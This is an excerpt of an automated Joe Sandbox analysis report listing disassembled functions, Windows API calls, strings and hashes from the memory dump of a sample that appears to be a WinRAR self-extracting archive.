                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                          • API String ID: 1116704506-4209811716
                                                          • Opcode ID: a81d317010a7ea955b64f6657227aedaf01de9858073994df2aa4ae704529895
                                                          • Instruction ID: dd0c6d66675b0b96b87a55a8a3555653b9887ef3ccf3b852b221e8298f36a6be
                                                          • Opcode Fuzzy Hash: a81d317010a7ea955b64f6657227aedaf01de9858073994df2aa4ae704529895
                                                          • Instruction Fuzzy Hash: 1B314C3290D3427BE725AF209C4BF6B77989F42320F18011EF501971D2EBA8D908A3A6
                                                          Function 00FCB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FB1316: GetDlgItem.USER32(00000000,00003021), ref: 00FB135A
                                                            • Part of subcall function 00FB1316: SetWindowTextW.USER32(00000000,00FE35F4), ref: 00FB1370
                                                          • EndDialog.USER32(?,00000001), ref: 00FCB610
                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00FCB637
                                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00FCB650
                                                          • SetWindowTextW.USER32(?,?), ref: 00FCB661
                                                          • GetDlgItem.USER32(?,00000065), ref: 00FCB66A
                                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00FCB67E
                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00FCB694
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Item$TextWindow$Dialog
                                                          • String ID: LICENSEDLG
                                                          • API String ID: 3214253823-2177901306
                                                          • Opcode ID: 162c735767ee500ecebadf54bbe5c1740f543672abc7c58115e1d8d0149d50d0
                                                          • Instruction ID: abbd0a87b80703fe0b57656add907d14cf4bd8933519a949039834dd0f69ac4b
                                                          • Opcode Fuzzy Hash: 162c735767ee500ecebadf54bbe5c1740f543672abc7c58115e1d8d0149d50d0
                                                          • Instruction Fuzzy Hash: 70218536604206BBD6325B65EE4BF3B3B6DFB46765F050058F68096184CB9F9801F735
                                                          Function 00FCFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,611FB576,00000001,00000000,00000000,?,?,00FBAF6C,ROOT\CIMV2), ref: 00FCFD99
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00FBAF6C,ROOT\CIMV2), ref: 00FCFE14
                                                          • SysAllocString.OLEAUT32(00000000), ref: 00FCFE1F
                                                          • _com_issue_error.COMSUPP ref: 00FCFE48
                                                          • _com_issue_error.COMSUPP ref: 00FCFE52
                                                          • GetLastError.KERNEL32(80070057,611FB576,00000001,00000000,00000000,?,?,00FBAF6C,ROOT\CIMV2), ref: 00FCFE57
                                                          • _com_issue_error.COMSUPP ref: 00FCFE6A
                                                          • GetLastError.KERNEL32(00000000,?,?,00FBAF6C,ROOT\CIMV2), ref: 00FCFE80
                                                          • _com_issue_error.COMSUPP ref: 00FCFE93
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                          • String ID:
                                                          • API String ID: 1353541977-0
                                                          • Opcode ID: d4221416f8117cbb46cc0f53b4631db805a3e33bfc5fdac7574ded6c88637a0a
                                                          • Instruction ID: 8ee22a18a58b3b5dc56c9159f1e9f59831d30dcdb8978ab0a4b9f5a83a21a930
                                                          • Opcode Fuzzy Hash: d4221416f8117cbb46cc0f53b4631db805a3e33bfc5fdac7574ded6c88637a0a
                                                          • Instruction Fuzzy Hash: 41410B71E0024AABC710DF64CD4AFAEFBAAEB44720F14423EF905D7291D7349A04A7E1
                                                          Function 00FBAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                          • API String ID: 3519838083-3505469590
                                                          • Opcode ID: 1bb65c5e2035bf3737d682322da21d93a5e6cf08cf8a104ae4c7b543f8dfc3c2
                                                          • Instruction ID: 376d3b915cbd227e3a0d8a9b7303e82dd01fbac2bd8c8a598368c2c95caf273e
                                                          • Opcode Fuzzy Hash: 1bb65c5e2035bf3737d682322da21d93a5e6cf08cf8a104ae4c7b543f8dfc3c2
                                                          • Instruction Fuzzy Hash: 1E717C71A00259AFDB14DFA6CC999BFB7B9FF49710B04015DE512A72A0CB74AE01EF60
                                                          Function 00FB9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00FB9387
                                                          • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00FB93AA
                                                          • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00FB93C9
                                                            • Part of subcall function 00FBC29A: _wcslen.LIBCMT ref: 00FBC2A2
                                                            • Part of subcall function 00FC1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00FBC116,00000000,.exe,?,?,00000800,?,?,?,00FC8E3C), ref: 00FC1FD1
                                                          • _swprintf.LIBCMT ref: 00FB9465
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                          • MoveFileW.KERNEL32(?,?), ref: 00FB94D4
                                                          • MoveFileW.KERNEL32(?,?), ref: 00FB9514
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                          • String ID: rtmp%d
                                                          • API String ID: 3726343395-3303766350
                                                          • Opcode ID: a09801815bfc49273b659c513b1f4b7cf1cd99738f906702e9c38d41ba763195
                                                          • Instruction ID: 9460afe4c3da67f29256af0876342ca6ac215416b071c7593b971cfddbe641bd
                                                          • Opcode Fuzzy Hash: a09801815bfc49273b659c513b1f4b7cf1cd99738f906702e9c38d41ba763195
                                                          • Instruction Fuzzy Hash: 24417371904259A6DF31EB62CD45EEE73BCAF41340F0448A9B709E3151DABC8B89AF60
                                                          Function 00FC1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __aulldiv.LIBCMT ref: 00FC122E
                                                            • Part of subcall function 00FBB146: GetVersionExW.KERNEL32(?), ref: 00FBB16B
                                                          • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00FC1251
                                                          • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00FC1263
                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00FC1274
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FC1284
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FC1294
                                                          • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00FC12CF
                                                          • __aullrem.LIBCMT ref: 00FC1379
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                          • String ID:
                                                          • API String ID: 1247370737-0
                                                          • Opcode ID: 97a8b659de082216879cfb45af78ffcb8f4d91bcc0cd14c46eda9e6b0a675c4a
                                                          • Instruction ID: 7712c15f3c45f129dd5d1cf2e085b598608954de5cfee3a15e3ff65024aa217b
                                                          • Opcode Fuzzy Hash: 97a8b659de082216879cfb45af78ffcb8f4d91bcc0cd14c46eda9e6b0a675c4a
                                                          • Instruction Fuzzy Hash: B94137B19083469FC710DF65C884A6BBBE9FB88314F00892EF596C6211E738E559DB51
                                                          Function 00FB2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _swprintf.LIBCMT ref: 00FB2536
                                                            • Part of subcall function 00FB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FB40A5
                                                            • Part of subcall function 00FC05DA: _wcslen.LIBCMT ref: 00FC05E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: __vswprintf_c_l_swprintf_wcslen
                                                          • String ID: ;%u$x%u$xc%u
                                                          • API String ID: 3053425827-2277559157
                                                          • Opcode ID: 441d8b0f023fd6fdfee143a65b34079708c2baa1ba68693c55d18cd16b45087c
                                                          • Instruction ID: e76936020e2c2a620ec59ab533a32f78a13f0e033d4f25c79461fc09f13ffec4
                                                          • Opcode Fuzzy Hash: 441d8b0f023fd6fdfee143a65b34079708c2baa1ba68693c55d18cd16b45087c
                                                          • Instruction Fuzzy Hash: 5FF12D71A043809BDB15EF2688D5BFE77956FA0300F08056DFD859B243CB68D949EFA2
                                                          Function 00FC9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: </p>$</style>$<br>$<style>$>
                                                          • API String ID: 176396367-3568243669
                                                          • Opcode ID: 59fee702b2abe0d2648a2bfeaa885cf06338f6bc95315209bad8cfbad2ff3b4c
                                                          • Instruction ID: d0c908c932940ac999b788691ba55ddf9d44f8c51780a168ad5e4d64a5c885e3
                                                          • Opcode Fuzzy Hash: 59fee702b2abe0d2648a2bfeaa885cf06338f6bc95315209bad8cfbad2ff3b4c
                                                          • Instruction Fuzzy Hash: A4512656E0836391DB30AA159E1BF7673E0DFA1770F58041EF9C29B2C0FAE58D41A2B1
                                                          Function 00FDF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00FDFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00FDF6CF
                                                          • __fassign.LIBCMT ref: 00FDF74A
                                                          • __fassign.LIBCMT ref: 00FDF765
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00FDF78B
                                                          • WriteFile.KERNEL32(?,00000000,00000000,00FDFE02,00000000,?,?,?,?,?,?,?,?,?,00FDFE02,00000000), ref: 00FDF7AA
                                                          • WriteFile.KERNEL32(?,00000000,00000001,00FDFE02,00000000,?,?,?,?,?,?,?,?,?,00FDFE02,00000000), ref: 00FDF7E3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: f00b18efe93c81422178a51137c23d07d984b7fbc69b727483393b27608bec67
                                                          • Instruction ID: afca61fd77d54f340b5121ce61023949a8ea558d9e3ce9cd205ee3743300c7e1
                                                          • Opcode Fuzzy Hash: f00b18efe93c81422178a51137c23d07d984b7fbc69b727483393b27608bec67
                                                          • Instruction Fuzzy Hash: A551A3B1D002499FCB10CFA4D885EEEBBF5EF08310F18416AE556E7351D634AA44DBA1
                                                          Function 00FD2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 00FD2937
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00FD293F
                                                          • _ValidateLocalCookies.LIBCMT ref: 00FD29C8
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00FD29F3
                                                          • _ValidateLocalCookies.LIBCMT ref: 00FD2A48
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 47a1e287ba7ba8d37838c7041456f70c179786afec6776a05e8dbd4a62d7f55b
                                                          • Instruction ID: f037bb07d516f963d14bf11471a837113ca886380d2cea24f2782d825216c9dd
                                                          • Opcode Fuzzy Hash: 47a1e287ba7ba8d37838c7041456f70c179786afec6776a05e8dbd4a62d7f55b
                                                          • Instruction Fuzzy Hash: A041B234E00258AFCF10DF28C895A9E7BB6EF54324F188056E915AB392D735DA05FBD2
                                                          Function 00FC9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(?,00000000), ref: 00FC9EEE
                                                          • GetWindowRect.USER32(?,00000000), ref: 00FC9F44
                                                          • ShowWindow.USER32(?,00000005,00000000), ref: 00FC9FDB
                                                          • SetWindowTextW.USER32(?,00000000), ref: 00FC9FE3
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00FC9FF9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$RectText
                                                          • String ID: RarHtmlClassName
                                                          • API String ID: 3937224194-1658105358
                                                          • Opcode ID: 256837f10a6a88c83d86ab663bc510fce2c8858bc6094e961fa0d5a04d21d306
                                                          • Instruction ID: 8e83a8ee55cdce5d54bb4e7c720eb67f260a1bb05b5cdda7c144e10aef57d3b4
                                                          • Opcode Fuzzy Hash: 256837f10a6a88c83d86ab663bc510fce2c8858bc6094e961fa0d5a04d21d306
                                                          • Instruction Fuzzy Hash: 8841F032408305AFCB209F649D4EF2B7BB8FF48325F04451DF9499914ADB78E814DB62
                                                          Function 00FC9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                          • API String ID: 176396367-3743748572
                                                          • Opcode ID: bb2517e4c8023fe51216b60a2721ed771da8422f9220be66f4057c518895cf7d
                                                          • Instruction ID: d1d978b319e366641e2a125ec59bf6c7b6912f3384a932d40a110ac0cf068845
                                                          • Opcode Fuzzy Hash: bb2517e4c8023fe51216b60a2721ed771da8422f9220be66f4057c518895cf7d
                                                          • Instruction Fuzzy Hash: B3315E32A4834756DA30AB549D47F7673A4EB90730F54441FF582872C0FAE8ED44A3A2
                                                          Function 00FDC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00FDC868: _free.LIBCMT ref: 00FDC891
                                                          • _free.LIBCMT ref: 00FDC8F2
                                                            • Part of subcall function 00FD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?), ref: 00FD8DE2
                                                            • Part of subcall function 00FD8DCC: GetLastError.KERNEL32(?,?,00FDC896,?,00000000,?,00000000,?,00FDC8BD,?,00000007,?,?,00FDCCBA,?,?), ref: 00FD8DF4
                                                          • _free.LIBCMT ref: 00FDC8FD
                                                          • _free.LIBCMT ref: 00FDC908
                                                          • _free.LIBCMT ref: 00FDC95C
                                                          • _free.LIBCMT ref: 00FDC967
                                                          • _free.LIBCMT ref: 00FDC972
                                                          • _free.LIBCMT ref: 00FDC97D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                          • Instruction ID: b3384083daa3888b31c1d04cca12c787282804e2537ecf6a62ca5e7a30c56488
                                                          • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                          • Instruction Fuzzy Hash: 8F110D71580B05BAE520B7B1CC07FCB7BAE9F44B00F484D16B2DD66292DA69A506F790
                                                          Function 00FCE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00FCE669,00FCE5CC,00FCE86D), ref: 00FCE605
                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00FCE61B
                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00FCE630
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
